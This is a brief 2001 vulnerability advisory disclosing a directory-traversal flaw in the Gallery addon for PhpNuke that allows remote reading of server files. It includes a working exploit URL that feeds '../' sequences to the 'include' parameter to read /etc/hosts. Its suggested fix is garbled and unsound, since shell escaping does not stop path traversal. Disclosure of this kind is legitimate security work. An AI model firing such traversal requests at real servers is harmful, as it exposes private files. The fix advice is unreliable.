Gallery Addon for PhpNuke remote file viewing vulnerability Problem discovered: 18/10/2001 by Cabezon Aurélien | aurelien.cabezon@iSecureLabs.com [1] Description Gallery is an intuitive web based photo gallery with authenticated users and privileged albums. Photo management includes automatic thumbnails, resizing, rotation, etc. Gallery is available as a Nuke 5.0 module. Gallery Addon is vulnerable to the ../.. bug that allow remote file reading on the web server as whatever user runs the web server. [2] Exploit http://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&; name=gallery&file=index&inclu de=../../../../../../etc/hosts [3] Fix Coder has been alerted. An easy way to fix such a vulnerability is to use the PHP included "system escapeshell" function. [4] Informations bout Gallery Addon for PhpNuke http://www.menalto.com/projects/gallery-nuke/ Author: bharat@menalto.com --- Cabezon Aurélien http://www.iSecureLabs.com aurelien.cabezon@iSecureLabs.
